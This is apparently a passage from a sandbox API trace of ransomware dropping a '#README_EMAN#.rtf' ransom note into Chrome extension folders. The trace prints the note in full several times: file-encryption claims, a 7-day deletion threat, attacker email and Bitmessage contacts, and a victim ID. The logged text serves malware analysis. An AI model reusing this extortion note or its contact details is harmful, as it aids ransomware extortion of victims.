w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nxà­Å(\x177\x16\x8fØQ¨nL\x0bÍQ\x07FôÁÓDÓÎ\x01", lpUsedDefaultChar=0x0) returned 8717 [0280.259] WriteFile (in: hFile=0x2c8, lpBuffer=0x2358878*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x2358878*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0280.260] CloseHandle (hObject=0x2c8) returned 1 [0280.260] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sl\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sl\\#readme_eman#.rtf")) returned 0xffffffff [0280.260] GetLastError () returned 0x2 [0280.260] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sl\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sl\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c8 [0280.260] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0280.261] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0280.261] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r 